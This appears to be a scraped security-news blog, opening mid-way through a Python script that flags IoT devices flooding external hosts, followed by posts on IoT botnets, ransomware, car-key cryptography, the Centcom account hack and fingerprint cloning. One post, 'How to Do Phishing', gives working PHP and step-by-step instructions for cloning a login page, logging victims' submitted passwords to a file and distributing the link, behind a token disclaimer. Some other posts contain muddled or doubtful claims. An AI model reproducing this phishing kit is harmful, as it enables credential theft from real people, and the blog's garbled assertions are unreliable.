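    """Return {device_ip: [(minute_start, dst_ip, packets), ...]} for local
    devices that sent more than `threshold` packets to one external address
    within a single one-minute bucket."""
    buckets = defaultdict(int)
    for ts, src, dst, _port, pkts in parse_flows(text):
        # Only outbound traffic matters: local source, external destination.
        if src not in home_net or dst in home_net:
            continue
        minute = ts - ts % 60
        buckets[(str(src), minute, str(dst))] += pkts

    alerts = defaultdict(list)
    for (src, minute, dst), pkts in sorted(buckets.items()):
        if pkts > threshold:
            alerts[src].append((minute, dst, pkts))
    return dict(alerts)


if __name__ == "__main__":
    for device, hits in find_flooders(SAMPLE_FLOWS).items():
        for minute, dst, pkts in hits:
            print(f"{device} sent {pkts} packets to {dst} in minute {minute}")
```

A device that shows up here is worth unplugging, resetting and giving a new password before it goes back on the network.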

Could I get in trouble for letting my webcam attack someone? 

In terms of legality, you can't get into trouble with the police. However, research suggests that a hacker can get into your internal network through a hacked webcam and keep tabs on everything else. In such a case you have an intruder, and it is best to get rid of them by taking the necessary action.

Why are malicious hackers using these devices? 

That's because they are far easier to hack than PCs or servers: these devices tend to use default passwords and have no security software in place. To the hackers' benefit, there are endless numbers of them, they stay on all day long, and they are a chore to both update and secure. Nowadays it is extremely easy for hackers: they can target vulnerable devices and put together an army of their own to create a botnet without having to rent hijacked machines as in the past.

What kind of devices are they scanning for? 

Web-connected cameras are especially popular, but scans are also being carried out for digital TV recorders, home routers and printers. All of these have a basic processor inside that can be subverted to pump out attack packets. Brian Krebs, the blogger who suffered an attack by an IoT botnet, has compiled a list of devices known to have flooded his site with data. Many of the login names and passwords for these devices are easy to crack. On 1 October, source code for one IoT attack was publicly shared, leading some to suggest that many more malicious hackers will now start scanning for vulnerable devices. A map made by security firm Symantec shows where Europe's botnets are hosted. Turkey is home to most of the hijacked devices and PCs.

How new are these types of attacks? 

The first DDoS attacks were seen on the web in 2000. The first wave of data bombardments was aimed at gambling sites, which were threatened with being knocked offline unless they paid a fee. Most of those extortion attempts used hijacked PCs to send data. Now the rise of the Internet of Things, populated with smart devices, has kicked off renewed interest in these kinds of attacks. Security researchers have warned about the dangers of insecure IoT devices for quite a while, yet they are beginning to be used for significant attacks sooner than many people expected.

Tuesday, 22 March 2016

Chinese Hackers Behind U.S. Ransomware Attacks Security Firms


A group of four security firms investigating cyber attacks on U.S.-based companies has found that most of the hackers use the same tactics and tools that were once associated with Chinese government-supported cyber attacks. Ransomware has become a major tool for unleashing cyber attacks on unsuspecting ordinary users. Ransomware, as the name suggests, takes control of the system and encrypts all the data stored on it, leaving the data inaccessible to the users. To get access back, users are required to pay a ransom of a few Bitcoins.

Hackers trick users into installing ransomware

Security firms have stated that hackers use various complex and highly intelligent ways to spread ransomware by actively exploiting vulnerabilities found in application servers. Once a vulnerability has been exploited, hackers trick users into installing ransomware on their devices. In one of the recent attacks, more than 30% of the machines at a transportation firm and a technology firm were infected with the ransomware.

The rise of ransomware over the years

Ransomware isn't something new: cyber criminals have used it widely for over a decade. In the beginning, unsuspecting users were lured into downloading infected programs or antivirus suites which, once installed, took over the device and demanded a ransom to restore access.

In recent years, however, cyber criminals have got their hands on better encryption techniques, which ensure that users cannot get access to their files without paying the ransom. Formatting the device is a sure way to get rid of the ransomware, but it comes at the cost of losing all the data on the device. Ransom payments are mainly made in the virtual currency Bitcoin, which offers secrecy from government agencies and others.

‘Mind’ game behind ransom

Ransomware happens to be one of the most successful tools of cyber criminals, as a large percentage of infected users end up paying the modest ransom for their inaccessible data. Cyber criminals usually set a modest price for giving access back to the users. Most victims are willing to pay this amount to get their data back, and this also results in positive responses in the online sphere. Suppose a victim pays about 1 or 2 Bitcoin, which amounts to $600, gets back access to his data, and then posts on online forums that he was relieved to finally regain access after paying the ransom operators. All the other victims searching online for this malady will be more willing to pay on the basis of this feedback.

On the other hand, security firms have warned victims that paying the ransom will only make cyber criminals more ambitious. Very soon they will shift from asking for ransoms of a few Bitcoins to running complicated scams and credit card theft as well.

Thursday, 24 September 2015

How it takes just 15 minutes of web tuition for anyone to hack into your email


Email Account Hacking – Easier & Faster


According to the latest study, email account hacking is easier and faster than expected and takes less than 15 minutes. A group of volunteers including a TV producer, a retiree and a self-employed baker managed to learn the technique of hacking into someone's account within about 15 minutes.

The group, with limited knowledge of technology, followed an online tutorial using a man-in-the-middle concept to hack into a computer network and obtain each other's login information. The controlled classroom trial, led by life assistance company CPP Group Plc, gave the helpers a 14-minute lesson that is freely available online.

Through this they were able to download hacking software that gave them access to login details and passwords for email accounts, online shopping accounts and social networking sites within a few minutes.

There seem to be more than 20,000 videos online coaching users on how to hack social media profiles, email, PayPal accounts and smartphones, and the internet's potential for hosting hacking tutorials seems to be unchallenged. It has been observed that over seven million people have had their password-protected online information accessed without their permission.

Government to Take a Stronger Stand on Online Hacking Tutorials


Many users have had their personal emails hacked, with around 19% stating that their eBay accounts have also been hacked. Social media users were not spared either, with 16% reporting that their social networking profiles had been tampered with and around 10% having had money or a loan taken out in their name. The increase in public Wi-Fi networks and in smartphones with built-in Wi-Fi connections over the last few years has created opportunities for hackers, and the scope for this type of crime will tend to increase in due course.

Most people are aware that online hacking tutorials exist, with several others agreeing that this type of coaching should not be made available to online users, since it creates a great deal of inconvenience for the victim and benefits the culprit.

More than half of people want governments to take timely action to eliminate these hacking tutorials from the internet. CPP has been advising people to take the necessary action to protect themselves from online hackers wherever possible and is also urging the government to take a stronger stand on online hacking tutorials.

Bring Awareness on Risks Involved


Michael Lynch, the firm's identity fraud expert, commented that the recent Sony security breach, which saw a hacker gain access to the personal data of over 100 million online gamers, including people in Britain, has shown the increasing and widespread danger that hackers pose to consumers as well as businesses.

It is essential to raise awareness of the risks involved so that people take adequate steps to protect their identities and safeguard their personal data from these hackers. The technique shown in the live session indicates that these hacking skills can be applied within a few minutes, so it is critical for consumers to take timely action and protect their data from these hackers.

They use the man-in-the-middle technique, in which the hacker intercepts communication between two users, or what an individual is viewing on the internet. As the user logs into an online account, the username and password also appear on the hacker's desktop, enabling him to store the information and access the account immediately or some time later.

Monday, 24 August 2015

Thousands of Cars Vulnerable to Keyless Theft, According to Researchers


Cars at Risk of Electronic Hacking

According to computer scientists, thousands of cars, including high-end marques like Porsche and Maserati, are at risk of electronic hacking; the research had been stifled for two years by a court injunction for fear that it would help thieves steal vehicles to order. It highlights a weakness in the Megamos Crypto system, a technology used by big manufacturers like Audi, Fiat, Honda, Volvo and Volkswagen.

It is designed to prevent a car engine from being started without the presence of a key fob containing the correct radio frequency identification chip. Nevertheless, researchers at Birmingham University and Radboud University in Nijmegen, the Netherlands, are able to intercept signals sent between the chip and the car.

Listening twice enables them to use a process of reverse engineering, with a commercially available computer programmer, to identify the secret codes used to start the car. Tim Watson, Director of Cyber Security at the University of Warwick, told Bloomberg that “it is not a theoretical weakness, it is an actual one; it does not cost theoretical dollars to fix, it costs actual dollars”.

Publication Ban Denied Public Crucial Information

In 2012, the researchers identified the flaw, though Volkswagen won a High Court injunction preventing its publication one year later. The motoring giant had commented that the work of Flavio Garcia at Birmingham University and his two Dutch colleagues would “allow someone, especially a sophisticated criminal gang with the right tools, to break the security and steal a car”.

In reply, the researchers argued that a publication ban denied the public crucial information about the security of their vehicles. Eventually they were able to present their results at the Usenix Security Symposium in Washington at the weekend, with a sentence redacted.

Their paper, “Dismantling Megamos Crypto: Wirelessly Lockpicking a Vehicle Immobiliser”, describes how they began their research, while police state that they were perplexed by the rising numbers of “keyless car theft”.

Chip System to Be Changed

The research had been published on the ground that the ban should block all essential information from the knowledge of the public. According to the Metropolitan Police, around 6000 vehicles seemed to be stolen without keys last year, half of which were all thefts.

The paper concluded that “the implications of the attacks portrayed in the paper were particularly serious for those vehicles having keyless ignition. At some point the mechanical key had been removed from the vehicle though the cryptographic mechanisms had not been strengthened to compensate it.”

It is recommended that the chip system be changed to one that includes a random number generator, making it difficult to use intercepted transmissions to break the codes.

Saturday, 24 January 2015

US Military Social-Media Accounts Hacked


According to reports, a hacker group that claims to be with the terrorist group ISIS and calls itself the “Cyber Caliphate” recently took complete control of the Centcom YouTube channel and Twitter account, which represent the United States central military command. The hackers tweeted a Pastebin titled “Pentagon account hacked” with a message that “American soldiers, we are coming, now its time when you should watch your back. #CyberCaliphate”. The message included links to what are supposed to be confidential US Army files.

However, according to sources, it has come to light that these files might previously have been made public; in other words, they cannot be deemed highly confidential. The files might not be confidential but, at the end of the day, it was the files of Centcom's social accounts that were compromised. This clearly indicates the pathetic state of cyber security in the United States government. And if the hackers are able to get their hands on some of the most confidential files, then it clearly indicates that ISIS is a more dreadful cyber-opponent than anyone would expect.

According to tweets from Politico reporter Hadas Gold at 9:46AM PST, Twitter was aware of the cyber attack on Centcom and was taking the necessary steps to work on the issue. According to an update at 10:05AM PST, Twitter was able to remove the cover image and the profile image from the Centcom account. This was followed by the suspension of the Centcom account at 10:10AM PST. At 10:15AM PST, an update indicated that a defense official had confirmed the attacks to Fusion reporter Brett LoGiurato, who tweeted that defense officials have confirmed that the United States Central Command Twitter account has been compromised. At 10:35AM PST another update indicated that YouTube had also suspended the hacked Centcom account. Around 11:55AM PST, The Next Web's Matt Navarra tweeted that a request had been received from the Pentagon pertaining to an account security issue and that they were working to resolve it.

Before the accounts could be shut, the following tweets were released from the account: 

1. Pentagon network hacked: Korean scenarios.
2. American soldiers, we are coming to you, now it’s time when you should watch your back.
3. We will not stop; we know everything about you, your wife, and your children.
4. ISIS is already here, we are in your computers, in each of your military base

While the US and its satellites kill our brothers and soldiers in Afghanistan, Syria and Iraq, then we broke into your networks and personal devices and know every information about you. The Cyber-Caliphate has also claimed to have taken control of the US media affiliates of CBS News and Fox in Tennessee. According to one anonymous post left on Pastebin, “In the name of Allah, the Most Gracious, the Most Merciful, the Cyber-Caliphate under the auspices of ISIS will continue with its Cyber-Jihad.”

Friday, 2 January 2015

Hacker Clones a Politician’s Fingerprint Using Normal, Long-Distance Public Photos


Something of this magnitude could not have been expected to happen in the past couple of years, but now, according to a member of the Chaos Computer Club, a European hacker association (along the lines of the Cult of the Dead Cow in the United States of America), it is possible.

They have successfully shown that it is quite possible to clone or reproduce anyone's fingerprints. The clone can be used to break into any system protected by a biometric fingerprint scanner. They just need a photo of someone's fingers. According to the club, they do not need close-up photos; any photo of a celebrity waving a hand, even from a distance, will do the trick.

In this case, the CCC was able to get the fingerprint of Germany's defense minister, Ursula von der Leyen, from a photo taken during a press conference. This could easily be considered a security breach if the German government uses biometric access control systems.

The findings: 

The findings were presented by the hacker Jan “Starbug” Krissler at the Chaos Communication Congress. He was able to recreate the minister's thumbprint using a photo of her taken at the press conference, along with some other photos showing her thumb from multiple angles. He used commercially available software called VeriFinger.

Jan created a real-world dummy using this thumbprint. He started by printing it onto a mask and then exposing it to create a negative print on a substrate. He then filled the negative with wood glue to create a new positive fingerprint. In testing, this technique can pose a serious threat to Apple's TouchID sensor, and if the minister has an Apple iPhone then the company can seriously get her into trouble. By this, the company is hoping that the German government is not relying on fingerprints to control its military systems.

What is the drawback? 

Digital fingerprint readers are becoming very common now and are found on everything from laptops to expensive high-end smartphones. The biggest problem with fingerprints is that they can give false positives, false negatives and even multiple readings of the same print with different results. Even though fingerprints are the best means of identification, the security and forensic communities are looking towards more reliable techniques.

DNA sequencing is considered one of the best means of forensic identification, and vein matching and gait analysis are the best options for access control. This technique is called living biometrics and, as the name suggests, it is only valid while the person is alive. It is already in use in Poland and Japan at some of their ATMs.

If you are among the people who are using fingerprints for access control, it might be a good time to switch over to something more reliable.



 

Saturday, 16 August 2014

How to Do Phishing

Phishing simply means creating a fake page of a popular website or company and using that page to steal personal information such as usernames, passwords, credit card details and account numbers. Phishing is one of the simplest techniques hackers use to take over an account by stealing the login details. Spotting a phishing page is quite difficult because it looks exactly like the home page of the original website, but the link or URL is different. So if you find a web page displaying the content of the original website under some other odd link, you must report it to the admin of the site.

Phishing is illegal, so please don't do it. But everyone should know how it takes place so that they are never caught out by the threat. So let us now learn how phishing is done and how a fake page is created, but before we begin let me declare:

DISCLAIMER : I am not responsible for any harm caused by the user. The tutorial is purely and only for educational purposes. Please do not misuse this tutorial. 
 

So it’s a kind request from everyone that please don’t misuse it but try to learn it so that you are not affected by this at any instance. So let’s begin:

Firstly you need to have a hosting account. You can also create a free hosting account that is available on many websites, you can simply google it and create an account in any one of them.

Now what hackers do is that they first select the target website like gmail, facebook etc. Once selected, they create the fake page of that original website.

Creating a fake page is quite simple. Just go to any website say Gmail and then right click and select the option “view source code” and then copy all the code in the notepad and save it as target.html.
Now other step is to create a file named “code.php”. Simply open note pad and copy the following
code:

<?php
header ('Location: http://www.xyz.com');

$handle = fopen("names.txt", "a");

foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

You can replace www.xyz.com with any website you want to direct user to.

Now after copying the following code save it as code.php and now it’s almost done.

Now go to the file target.html and open it because some editing has to be done. Now press ctrl+f and search for “action=” with login written in it. You will observe one link there so replace that link or URL with the file code.php that you have created initially. And now it’s almost done. Also create one file named names.txt where you will get the passwords of the infected user.

Now simply go your hosting account and upload the three files that are: target.html, code.php and name.txt. After they are successfully uploaded it’s ready. Now you will have a link to the fake page like: http://abcxyz.com/target.htm. You can select domain name according to your choice. Now the fake page is ready and now you can submit this link to your friend or anyone else. If he login to this fake page then you can check his username and password in the names.txt file as all the passwords will be stored here.

So this is all about hacking through phishing. But I request you all not to misuse it because it's illegal and a serious cyber-crime. I hope you will never become the victim of such fake pages. Simply have a look at the link before you log in, or first reload the page and then log in to the account. In later posts we will cover more interesting tricks like this, so stay connected.

Friday, 18 November 2011

Anonymous attack


Anonymous declares war on an internal group whose actions would be more faithful to the beliefs of the hackers group. Anonymous seems to have had more than enough of a few renegades who use its name to initiate actions that the group does not endorse. The attack on Facebook these days, claimed by some people claiming to belong to Anonymous, seems to have been too much for the group, which decided to respond.

It is a smaller group, claiming to be Anonymous and named "AnonOps," that is at the center of the controversy. AnonOps is accused of having "gone to the dark side" and of being "blind with power who treat newcomers with contempt and arrogance instead of fighting corruption and censorship on the Internet," says Anonymous.